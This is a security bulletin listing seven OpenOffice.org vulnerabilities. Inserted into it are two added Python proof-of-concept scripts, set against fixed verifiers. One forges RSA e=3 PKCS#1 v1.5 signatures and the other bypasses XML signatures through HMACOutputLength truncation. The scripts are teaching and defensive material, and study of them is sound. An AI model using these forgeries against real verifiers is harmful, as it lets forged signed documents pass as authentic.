The Vigil@nce team watches public vulnerabilities impacting your computers, and then offers security solutions, a database and tools to fix them.

Vulnerability alert: CVE-2006-4339, CVE-2009-0217, CVE-2009-2493

OpenOffice.org: several vulnerabilities

Synthesis of the vulnerability

An attacker can trick the victim into opening a malicious document with OpenOffice.org, in order to execute code on the victim's computer.
Vulnerable software: OpenOffice, Debian, Fedora, Mandriva Linux, NLD, OES, openSUSE, RHEL, SLES.
Severity of this announcement: 3/4.
Consequences of an intrusion: user access/rights, data reading, data creation/edition.
Attacker's origin: document.
Number of vulnerabilities in this bulletin: 7.
Creation date: 12 February 2010.
References for this computer vulnerability: BID-19849, BID-35671, BID-38218, CERTA-2006-AVI-384, CERTA-2007-AVI-546, CERTA-2009-AVI-279, CERTA-2009-AVI-435, CERTA-2009-AVI-452, CERTA-2009-AVI-538, CERTA-2010-AVI-080, CERTA-2010-AVI-253, CERTA-2010-AVI-499, CVE-2006-4339, CVE-2009-0217, CVE-2009-2493, CVE-2009-2949, CVE-2009-2950, CVE-2009-3301, CVE-2009-3302, DSA-1995-1, FEDORA-2010-1847, FEDORA-2010-1941, MDVSA-2010:221, RHSA-2010:0101-02, SUSE-SA:2010:017, VIGILANCE-VUL-9451, VU#456745, VU#466161, VU#845620.

Description of the vulnerability

Several vulnerabilities were announced in OpenOffice.org.

An attacker can forge a PKCS #1 v1.5 RSA signature that a lax verifier accepts as valid when the public exponent is small, such as e = 3 (Bleichenbacher's forgery against verifiers that do not check that the DigestInfo ends exactly at the end of the padded block) (VIGILANCE-VUL-6140). [severity:2/4; BID-19849, CERTA-2006-AVI-384, CERTA-2007-AVI-546, CVE-2006-4339, VU#845620]
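The forgery behind CVE-2006-4339, as an added worked example that is not part of the Vigil@nce bulletin or of OpenOffice.org's code. The modulus is a constructed 3072-bit odd number from a seeded PRNG rather than a real key: the attacker never needs the factorization, because the forged cube s^3 = 00 01 FF 00 DigestInfo(msg) || garbage stays below n and so never wraps. The lax verifier reads the DigestInfo right after the first 00 separator and ignores whatever follows; the fixed verifier rebuilds the full expected encoding and compares it end to end. Names such as lax_verify, strict_verify and forge are this example's own.

```python
"""Bleichenbacher-style PKCS #1 v1.5 signature forgery against a lax verifier (e = 3)."""
import hashlib
import hmac
from random import Random

E = 3                 # the forgery only works for small public exponents
MOD_BITS = 3072

# DER prefix of DigestInfo for SHA-1 (RFC 3447, section 9.2, note 1)
SHA1_DIGESTINFO_PREFIX = bytes.fromhex("3021300906052b0e03021a05000414")


def digest_info(msg: bytes) -> bytes:
    return SHA1_DIGESTINFO_PREFIX + hashlib.sha1(msg).digest()


def stand_in_modulus(seed: int = 1) -> int:
    """Constructed 3072-bit odd modulus from a seeded PRNG (not a real key).
    The forged cube never exceeds n, so its factorization is irrelevant here."""
    rng = Random(seed)
    return rng.getrandbits(MOD_BITS) | (1 << (MOD_BITS - 1)) | 1


def _encoded_message(n: int, sig: int) -> bytes:
    k = (n.bit_length() + 7) // 8
    return pow(sig, E, n).to_bytes(k, "big")


def lax_verify(n: int, sig: int, msg: bytes) -> bool:
    """Buggy verifier: parses 00 01 FF.. 00 DigestInfo and ignores trailing bytes."""
    em = _encoded_message(n, sig)
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i >= len(em) or em[i] != 0x00:
        return False
    i += 1
    di = digest_info(msg)
    return em[i:i + len(di)] == di   # BUG: nothing checks that DigestInfo ends at the end of em


def strict_verify(n: int, sig: int, msg: bytes) -> bool:
    """Fixed verifier: rebuild the whole expected encoding and compare it in full."""
    em = _encoded_message(n, sig)
    di = digest_info(msg)
    pad_len = len(em) - 3 - len(di)
    if pad_len < 8:
        return False
    expected = b"\x00\x01" + b"\xff" * pad_len + b"\x00" + di
    return hmac.compare_digest(em, expected)


def icbrt(x: int) -> int:
    """Floor of the integer cube root (binary search on big ints)."""
    lo, hi = 0, 1 << ((x.bit_length() + 2) // 3 + 1)
    while lo < hi:
        mid = (lo + hi) // 2
        if mid ** 3 <= x:
            lo = mid + 1
        else:
            hi = mid
    return lo - 1


def forge(n: int, msg: bytes) -> int:
    """Return s with s**3 = 00 01 FF 00 DigestInfo(msg) || garbage, without any private key."""
    k = (n.bit_length() + 7) // 8
    prefix = b"\x00\x01\xff\x00" + digest_info(msg)
    target = int.from_bytes(prefix + b"\x00" * (k - len(prefix)), "big")
    s = icbrt(target)
    if s ** 3 < target:
        s += 1                        # ceiling cube root
    # s**3 - target < 3*s**2 + 3*s + 1, about 2**2040 for a 3072-bit modulus, while the
    # garbage area after DigestInfo is 2760 bits wide, so the prefix bytes are untouched.
    assert (s ** 3).to_bytes(k, "big")[:len(prefix)] == prefix and s ** 3 < n
    return s


if __name__ == "__main__":
    n = stand_in_modulus()
    m = b"constructed message the victim never signed"
    s = forge(n, m)
    print("lax verifier accepts forgery:   ", lax_verify(n, s, m))
    print("strict verifier accepts forgery:", strict_verify(n, s, m))
```

The forgery is bound to one message hash (changing the message changes DigestInfo and the lax verifier rejects it), so the attack only helps when the attacker can choose which document is presented; the point for a verifier is that the padding must be checked in full, not scanned for a separator.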

An attacker can bypass the signature check on an XML document because the XMLDsig recommendation let the signer choose HMACOutputLength, the number of HMAC bits actually compared, with no lower bound, so a forged SignedInfo asking for a one-bit (or zero-bit) HMAC is trivially guessable (VIGILANCE-VUL-8864). [severity:3/4; BID-35671, CERTA-2009-AVI-279, CERTA-2009-AVI-452, CERTA-2010-AVI-253, CVE-2009-0217, VU#466161]
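The HMAC truncation bypass of CVE-2009-0217, as an added worked example that is neither the bulletin's nor OpenOffice.org's own code. The SignedInfo fragment, the shared key and the payload digest are constructed; XML canonicalization is deliberately skipped and the HMAC is taken over the SignedInfo bytes as given, since C14N is not the point. The attacker writes HMACOutputLength=1 into SignedInfo, so only the first bit of the MAC is compared and two candidate SignatureValues cover every possibility; the fixed verifier refuses any requested length below 80 bits or below half the digest length, which is the floor the patched implementations adopted. Function names (lax_verify, strict_verify, forge_candidates) belong to this example.

```python
"""XML Signature HMAC truncation (CVE-2009-0217 class): attacker-chosen HMACOutputLength."""
import base64
import hashlib
import hmac
import xml.etree.ElementTree as ET

DS = "http://www.w3.org/2000/09/xmldsig#"
KEY = b"constructed-shared-secret"                                    # constructed
PAYLOAD_DIGEST = base64.b64encode(hashlib.sha1(b"").digest()).decode()  # constructed placeholder

# Constructed SignedInfo. The attacker authors it, so they also pick HMACOutputLength,
# and the HMAC is computed over this text (C14N omitted in this example).
SIGNED_INFO_TEMPLATE = (
    '<SignedInfo xmlns="http://www.w3.org/2000/09/xmldsig#">'
    '<CanonicalizationMethod Algorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/>'
    '<SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#hmac-sha1">{length}</SignatureMethod>'
    '<Reference URI="#payload"><DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/>'
    '<DigestValue>{digest}</DigestValue></Reference></SignedInfo>'
)


def signed_info(output_length=None) -> bytes:
    length_xml = "" if output_length is None else f"<HMACOutputLength>{output_length}</HMACOutputLength>"
    return SIGNED_INFO_TEMPLATE.format(length=length_xml, digest=PAYLOAD_DIGEST).encode()


def requested_output_length(si: bytes):
    """Read HMACOutputLength from SignedInfo, or None when absent."""
    node = ET.fromstring(si).find(f"{{{DS}}}SignatureMethod/{{{DS}}}HMACOutputLength")
    return None if node is None else int(node.text)


def truncate(mac: bytes, bits: int) -> bytes:
    """Keep the leading `bits` bits of mac, as HMACOutputLength asks."""
    nbytes = (bits + 7) // 8
    out = bytearray(mac[:nbytes])
    if bits % 8 and nbytes:
        out[-1] &= (0xFF << (8 - bits % 8)) & 0xFF
    return bytes(out)


def lax_verify(key: bytes, si: bytes, sig: bytes) -> bool:
    """Vulnerable: honours any HMACOutputLength, down to 1 or even 0 bits."""
    mac = hmac.new(key, si, hashlib.sha1).digest()
    bits = requested_output_length(si)
    if bits is None:
        bits = 8 * len(mac)
    return hmac.compare_digest(truncate(mac, bits), truncate(sig, bits))


MIN_HMAC_BITS = 80   # floor used by the fixed implementations, together with half the digest


def strict_verify(key: bytes, si: bytes, sig: bytes) -> bool:
    """Fixed: reject a truncation shorter than max(80, digest/2) bits or longer than the digest."""
    mac = hmac.new(key, si, hashlib.sha1).digest()
    full = 8 * len(mac)
    bits = requested_output_length(si)
    if bits is None:
        bits = full
    if bits < max(MIN_HMAC_BITS, full // 2) or bits > full:
        return False
    return hmac.compare_digest(truncate(mac, bits), truncate(sig, bits))


def forge_candidates(bits: int):
    """Attacker without the key: for bits <= 8, every possible truncated value in one byte."""
    return [bytes([v << (8 - bits)]) for v in range(1 << bits)]


if __name__ == "__main__":
    forged = signed_info(1)
    hits = [c.hex() for c in forge_candidates(1) if lax_verify(KEY, forged, c)]
    print("lax verifier accepted candidate(s):", hits)
    print("strict verifier accepts any candidate:",
          any(strict_verify(KEY, forged, c) for c in forge_candidates(1)))
```

With HMACOutputLength set to 0 the lax verifier compares two empty strings and accepts any SignatureValue at all; with 1 bit the attacker needs at most two attempts. Either way the attacker also controls the Reference digests inside SignedInfo, so the bypass covers the signed content, not just the MAC.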

On Windows, OpenOffice.org ships a vulnerable Microsoft Visual C++ runtime (the Active Template Library flaws fixed by Microsoft in 2009) (VIGILANCE-VUL-8895). [severity:3/4; CERTA-2009-AVI-435, CERTA-2009-AVI-538, CVE-2009-2493, VU#456745]

An attacker can trick the victim into opening a document containing a malicious XPM image with OpenOffice.org (integer overflow in the XPM import filter), in order to execute code on the victim's computer. [severity:3/4; CERTA-2010-AVI-499, CVE-2009-2949]

An attacker can trick the victim into opening a document containing a malicious GIF image with OpenOffice.org (heap-based buffer overflow in the GIF import filter), in order to execute code on the victim's computer. [severity:3/4; CVE-2009-2950]

An attacker can trick the victim into opening a Word document containing a malicious sprmTDefTable table property modifier with OpenOffice.org (integer underflow in the Word import filter), in order to execute code on the victim's computer. [severity:3/4; CVE-2009-3301]

An attacker can trick the victim into opening a Word document containing a malicious sprmTSetBrc table border property modifier with OpenOffice.org (integer underflow in the Word import filter), in order to execute code on the victim's computer. [severity:3/4; CVE-2009-3302]
